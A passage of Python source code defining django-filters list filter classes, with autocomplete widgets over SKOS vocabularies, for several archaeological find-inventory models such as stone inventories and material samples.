'data-minimum-input-length': 2,
},
)
)
phase_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="phase_id"
),
help_text=Fundinventar4DPuzzleID._meta.get_field('phase_id').help_text,
label=Fundinventar4DPuzzleID._meta.get_field('phase_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/phase_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Fundinventar4DPuzzleID
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'excavation_object_id',
'find_inventory_4dpuzzle_number',
'find_local_number',
'convolute_inventory_number',
'corresponding_to_inventory_number',
'find_comment',
'stratum_comment',
'find_date',
'storage_find',
'relatedto',
'find_material',
'digitisation_comment',
'find_type',
'access',
'uncertainty_excavation_digitisation',
'creator_metadata',
'archaeological_object_id',
'stratum_id_relative',
'stratum_id_absolute_prepub',
'phase_id',
]
class FundinventarInventarnummernListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarInventarnummern._meta.get_field('legacy_id').help_text,
label=FundinventarInventarnummern._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarInventarnummern._meta.get_field('fc_name').help_text,
label=FundinventarInventarnummern._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarInventarnummern._meta.get_field('fc_directory').help_text,
label=FundinventarInventarnummern._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarInventarnummern._meta.get_field('fc_type').help_text,
label=FundinventarInventarnummern._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarInventarnummern._meta.get_field('fc_filename').help_text,
label=FundinventarInventarnummern._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarInventarnummern._meta.get_field('fc_extension').help_text,
label=FundinventarInventarnummern._meta.get_field('fc_extension').verbose_name
)
find_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarInventarnummern._meta.get_field('find_inventory_number').help_text,
label=FundinventarInventarnummern._meta.get_field('find_inventory_number').verbose_name
)
find_local_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarInventarnummern._meta.get_field('find_local_number').help_text,
label=FundinventarInventarnummern._meta.get_field('find_local_number').verbose_name
)
convolute_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarInventarnummern._meta.get_field('convolute_inventory_number').help_text,
label=FundinventarInventarnummern._meta.get_field('convolute_inventory_number').verbose_name
)
find_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarInventarnummern._meta.get_field('find_comment').help_text,
label=FundinventarInventarnummern._meta.get_field('find_comment').verbose_name
)
find_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="find_material"
),
help_text=FundinventarInventarnummern._meta.get_field('find_material').help_text,
label=FundinventarInventarnummern._meta.get_field('find_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/find_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
find_type = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="find_type"
),
help_text=FundinventarInventarnummern._meta.get_field('find_type').help_text,
label=FundinventarInventarnummern._meta.get_field('find_type').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/find_type",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
stratum_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarInventarnummern._meta.get_field('stratum_comment').help_text,
label=FundinventarInventarnummern._meta.get_field('stratum_comment').verbose_name
)
stratum_id_relative = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="stratum_id_relative"
),
help_text=FundinventarInventarnummern._meta.get_field('stratum_id_relative').help_text,
label=FundinventarInventarnummern._meta.get_field('stratum_id_relative').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/stratum_id_relative",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
storage_find = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarInventarnummern._meta.get_field('storage_find').help_text,
label=FundinventarInventarnummern._meta.get_field('storage_find').verbose_name
)
stratum_id_absolute_prepub = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="stratum_id_absolute_prepub"
),
help_text=FundinventarInventarnummern._meta.get_field('stratum_id_absolute_prepub').help_text,
label=FundinventarInventarnummern._meta.get_field('stratum_id_absolute_prepub').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/stratum_id_absolute_prepub",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
phase_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="phase_id"
),
help_text=FundinventarInventarnummern._meta.get_field('phase_id').help_text,
label=FundinventarInventarnummern._meta.get_field('phase_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/phase_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
relatedto = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="relatedto"
),
help_text=FundinventarInventarnummern._meta.get_field('relatedto').help_text,
label=FundinventarInventarnummern._meta.get_field('relatedto').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/relatedto",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=FundinventarInventarnummern._meta.get_field('access').help_text,
label=FundinventarInventarnummern._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarInventarnummern._meta.get_field('digitisation_comment').help_text,
label=FundinventarInventarnummern._meta.get_field('digitisation_comment').verbose_name
)
uncertainty_excavation_digitisation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="uncertainty_excavation_digitisation"
),
help_text=FundinventarInventarnummern._meta.get_field('uncertainty_excavation_digitisation').help_text,
label=FundinventarInventarnummern._meta.get_field('uncertainty_excavation_digitisation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/uncertainty_excavation_digitisation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = FundinventarInventarnummern
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'archaeological_object_id',
'corresponding_to_inventory_number',
'find_inventory_number',
'find_local_number',
'convolute_inventory_number',
'find_comment',
'excavation_object_id',
'find_material',
'find_type',
'stratum_comment',
'stratum_id_relative',
'find_date',
'storage_find',
'stratum_id_absolute_prepub',
'phase_id',
'relatedto',
'access',
'digitisation_comment',
'uncertainty_excavation_digitisation',
]
class FundinventarKonvolutnummernListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarKonvolutnummern._meta.get_field('legacy_id').help_text,
label=FundinventarKonvolutnummern._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarKonvolutnummern._meta.get_field('fc_name').help_text,
label=FundinventarKonvolutnummern._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarKonvolutnummern._meta.get_field('fc_directory').help_text,
label=FundinventarKonvolutnummern._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarKonvolutnummern._meta.get_field('fc_type').help_text,
label=FundinventarKonvolutnummern._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarKonvolutnummern._meta.get_field('fc_filename').help_text,
label=FundinventarKonvolutnummern._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarKonvolutnummern._meta.get_field('fc_extension').help_text,
label=FundinventarKonvolutnummern._meta.get_field('fc_extension').verbose_name
)
convolute_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarKonvolutnummern._meta.get_field('convolute_inventory_number').help_text,
label=FundinventarKonvolutnummern._meta.get_field('convolute_inventory_number').verbose_name
)
convolute_subnumber = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarKonvolutnummern._meta.get_field('convolute_subnumber').help_text,
label=FundinventarKonvolutnummern._meta.get_field('convolute_subnumber').verbose_name
)
find_local_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarKonvolutnummern._meta.get_field('find_local_number').help_text,
label=FundinventarKonvolutnummern._meta.get_field('find_local_number').verbose_name
)
corresponding_to_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarKonvolutnummern._meta.get_field('corresponding_to_inventory_number').help_text,
label=FundinventarKonvolutnummern._meta.get_field('corresponding_to_inventory_number').verbose_name
)
find_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="find_material"
),
help_text=FundinventarKonvolutnummern._meta.get_field('find_material').help_text,
label=FundinventarKonvolutnummern._meta.get_field('find_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/find_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
find_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarKonvolutnummern._meta.get_field('find_comment').help_text,
label=FundinventarKonvolutnummern._meta.get_field('find_comment').verbose_name
)
find_type = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="find_type"
),
help_text=FundinventarKonvolutnummern._meta.get_field('find_type').help_text,
label=FundinventarKonvolutnummern._meta.get_field('find_type').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/find_type",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
stratum_id_relative = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="stratum_id_relative"
),
help_text=FundinventarKonvolutnummern._meta.get_field('stratum_id_relative').help_text,
label=FundinventarKonvolutnummern._meta.get_field('stratum_id_relative').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/stratum_id_relative",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
stratum_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarKonvolutnummern._meta.get_field('stratum_comment').help_text,
label=FundinventarKonvolutnummern._meta.get_field('stratum_comment').verbose_name
)
stratum_id_absolute_prepub = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="stratum_id_absolute_prepub"
),
help_text=FundinventarKonvolutnummern._meta.get_field('stratum_id_absolute_prepub').help_text,
label=FundinventarKonvolutnummern._meta.get_field('stratum_id_absolute_prepub').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/stratum_id_absolute_prepub",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
phase_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="phase_id"
),
help_text=FundinventarKonvolutnummern._meta.get_field('phase_id').help_text,
label=FundinventarKonvolutnummern._meta.get_field('phase_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/phase_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
storage_find = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="storage_find"
),
help_text=FundinventarKonvolutnummern._meta.get_field('storage_find').help_text,
label=FundinventarKonvolutnummern._meta.get_field('storage_find').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/storage_find",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=FundinventarKonvolutnummern._meta.get_field('access').help_text,
label=FundinventarKonvolutnummern._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
relatedto = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarKonvolutnummern._meta.get_field('relatedto').help_text,
label=FundinventarKonvolutnummern._meta.get_field('relatedto').verbose_name
)
uncertainty_excavation_digitisation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="uncertainty_excavation_digitisation"
),
help_text=FundinventarKonvolutnummern._meta.get_field('uncertainty_excavation_digitisation').help_text,
label=FundinventarKonvolutnummern._meta.get_field('uncertainty_excavation_digitisation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/uncertainty_excavation_digitisation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarKonvolutnummern._meta.get_field('digitisation_comment').help_text,
label=FundinventarKonvolutnummern._meta.get_field('digitisation_comment').verbose_name
)
creator_metadata = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="creator_metadata"
),
help_text=FundinventarKonvolutnummern._meta.get_field('creator_metadata').help_text,
label=FundinventarKonvolutnummern._meta.get_field('creator_metadata').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/creator_metadata",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = FundinventarKonvolutnummern
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'convolute_inventory_number',
'convolute_subnumber',
'find_local_number',
'corresponding_to_inventory_number',
'find_material',
'find_comment',
'excavation_object_id',
'archaeological_object_id',
'find_type',
'stratum_id_relative',
'stratum_comment',
'stratum_id_absolute_prepub',
'find_date',
'phase_id',
'storage_find',
'access',
'relatedto',
'uncertainty_excavation_digitisation',
'digitisation_comment',
'creator_metadata',
]
class FundinventarMaterialprobenListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarMaterialproben._meta.get_field('legacy_id').help_text,
label=FundinventarMaterialproben._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarMaterialproben._meta.get_field('fc_name').help_text,
label=FundinventarMaterialproben._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarMaterialproben._meta.get_field('fc_directory').help_text,
label=FundinventarMaterialproben._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarMaterialproben._meta.get_field('fc_type').help_text,
label=FundinventarMaterialproben._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarMaterialproben._meta.get_field('fc_filename').help_text,
label=FundinventarMaterialproben._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarMaterialproben._meta.get_field('fc_extension').help_text,
label=FundinventarMaterialproben._meta.get_field('fc_extension').verbose_name
)
material_sample_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarMaterialproben._meta.get_field('material_sample_inventory_number').help_text,
label=FundinventarMaterialproben._meta.get_field('material_sample_inventory_number').verbose_name
)
find_local_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarMaterialproben._meta.get_field('find_local_number').help_text,
label=FundinventarMaterialproben._meta.get_field('find_local_number').verbose_name
)
convolute_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarMaterialproben._meta.get_field('convolute_inventory_number').help_text,
label=FundinventarMaterialproben._meta.get_field('convolute_inventory_number').verbose_name
)
corresponding_to_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarMaterialproben._meta.get_field('corresponding_to_inventory_number').help_text,
label=FundinventarMaterialproben._meta.get_field('corresponding_to_inventory_number').verbose_name
)
find_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="find_material"
),
help_text=FundinventarMaterialproben._meta.get_field('find_material').help_text,
label=FundinventarMaterialproben._meta.get_field('find_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/find_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
find_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarMaterialproben._meta.get_field('find_comment').help_text,
label=FundinventarMaterialproben._meta.get_field('find_comment').verbose_name
)
find_type = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="find_type"
),
help_text=FundinventarMaterialproben._meta.get_field('find_type').help_text,
label=FundinventarMaterialproben._meta.get_field('find_type').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/find_type",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
stratum_id_relative = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="stratum_id_relative"
),
help_text=FundinventarMaterialproben._meta.get_field('stratum_id_relative').help_text,
label=FundinventarMaterialproben._meta.get_field('stratum_id_relative').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/stratum_id_relative",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
stratum_id_absolute_prepub = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="stratum_id_absolute_prepub"
),
help_text=FundinventarMaterialproben._meta.get_field('stratum_id_absolute_prepub').help_text,
label=FundinventarMaterialproben._meta.get_field('stratum_id_absolute_prepub').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/stratum_id_absolute_prepub",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
stratum_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarMaterialproben._meta.get_field('stratum_comment').help_text,
label=FundinventarMaterialproben._meta.get_field('stratum_comment').verbose_name
)
phase_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="phase_id"
),
help_text=FundinventarMaterialproben._meta.get_field('phase_id').help_text,
label=FundinventarMaterialproben._meta.get_field('phase_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/phase_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
storage_find = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="storage_find"
),
help_text=FundinventarMaterialproben._meta.get_field('storage_find').help_text,
label=FundinventarMaterialproben._meta.get_field('storage_find').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/storage_find",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=FundinventarMaterialproben._meta.get_field('access').help_text,
label=FundinventarMaterialproben._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
uncertainty_excavation_digitisation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="uncertainty_excavation_digitisation"
),
help_text=FundinventarMaterialproben._meta.get_field('uncertainty_excavation_digitisation').help_text,
label=FundinventarMaterialproben._meta.get_field('uncertainty_excavation_digitisation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/uncertainty_excavation_digitisation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarMaterialproben._meta.get_field('digitisation_comment').help_text,
label=FundinventarMaterialproben._meta.get_field('digitisation_comment').verbose_name
)
class Meta:
model = FundinventarMaterialproben
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'archaeological_object_id',
'relatedto',
'material_sample_inventory_number',
'find_local_number',
'convolute_inventory_number',
'corresponding_to_inventory_number',
'find_material',
'find_comment',
'excavation_object_id',
'find_type',
'stratum_id_relative',
'stratum_id_absolute_prepub',
'stratum_comment',
'phase_id',
'find_year',
'storage_find',
'access',
'uncertainty_excavation_digitisation',
'digitisation_comment',
]
class FundinventarSteininventarListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarSteininventar._meta.get_field('legacy_id').help_text,
label=FundinventarSteininventar._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarSteininventar._meta.get_field('fc_name').help_text,
label=FundinventarSteininventar._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarSteininventar._meta.get_field('fc_directory').help_text,
label=FundinventarSteininventar._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarSteininventar._meta.get_field('fc_type').help_text,
label=FundinventarSteininventar._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarSteininventar._meta.get_field('fc_filename').help_text,
label=FundinventarSteininventar._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarSteininventar._meta.get_field('fc_extension').help_text,
label=FundinventarSteininventar._meta.get_field('fc_extension').verbose_name
)
find_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="find_material"
),
help_text=FundinventarSteininventar._meta.get_field('find_material').help_text,
label=FundinventarSteininventar._meta.get_field('find_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/find_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
find_type = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="find_type"
),
help_text=FundinventarSteininventar._meta.get_field('find_type').help_text,
label=FundinventarSteininventar._meta.get_field('find_type').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/find_type",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
find_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarSteininventar._meta.get_field('find_inventory_number').help_text,
label=FundinventarSteininventar._meta.get_field('find_inventory_number').verbose_name
)
find_local_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarSteininventar._meta.get_field('find_local_number').help_text,
label=FundinventarSteininventar._meta.get_field('find_local_number').verbose_name
)
convolute_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarSteininventar._meta.get_field('convolute_inventory_number').help_text,
label=FundinventarSteininventar._meta.get_field('convolute_inventory_number').verbose_name
)
corresponding_to_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarSteininventar._meta.get_field('corresponding_to_inventory_number').help_text,
label=FundinventarSteininventar._meta.get_field('corresponding_to_inventory_number').verbose_name
)
stratum_id_relative = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="stratum_id_relative"
),
help_text=FundinventarSteininventar._meta.get_field('stratum_id_relative').help_text,
label=FundinventarSteininventar._meta.get_field('stratum_id_relative').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/stratum_id_relative",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
stratum_id_absolute_prepub = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="stratum_id_absolute_prepub"
),
help_text=FundinventarSteininventar._meta.get_field('stratum_id_absolute_prepub').help_text,
label=FundinventarSteininventar._meta.get_field('stratum_id_absolute_prepub').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/stratum_id_absolute_prepub",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
find_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarSteininventar._meta.get_field('find_comment').help_text,
label=FundinventarSteininventar._meta.get_field('find_comment').verbose_name
)
phase_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="phase_id"
),
help_text=FundinventarSteininventar._meta.get_field('phase_id').help_text,
label=FundinventarSteininventar._meta.get_field('phase_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/phase_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=FundinventarSteininventar._meta.get_field('access').help_text,
label=FundinventarSteininventar._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
storage_find = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="storage_find"
),
help_text=FundinventarSteininventar._meta.get_field('storage_find').help_text,
label=FundinventarSteininventar._meta.get_field('storage_find').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/storage_find",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
stratum_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarSteininventar._meta.get_field('stratum_comment').help_text,
label=FundinventarSteininventar._meta.get_field('stratum_comment').verbose_name
)
uncertainty_excavation_digitisation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="uncertainty_excavation_digitisation"
),
help_text=FundinventarSteininventar._meta.get_field('uncertainty_excavation_digitisation').help_text,
label=FundinventarSteininventar._meta.get_field('uncertainty_excavation_digitisation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/uncertainty_excavation_digitisation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
relatedto = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="relatedto"
),
help_text=FundinventarSteininventar._meta.get_field('relatedto').help_text,
label=FundinventarSteininventar._meta.get_field('relatedto').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/relatedto",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarSteininventar._meta.get_field('digitisation_comment').help_text,
label=FundinventarSteininventar._meta.get_field('digitisation_comment').verbose_name
)
class Meta:
model = FundinventarSteininventar
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'archaeological_object_id',
'find_material',
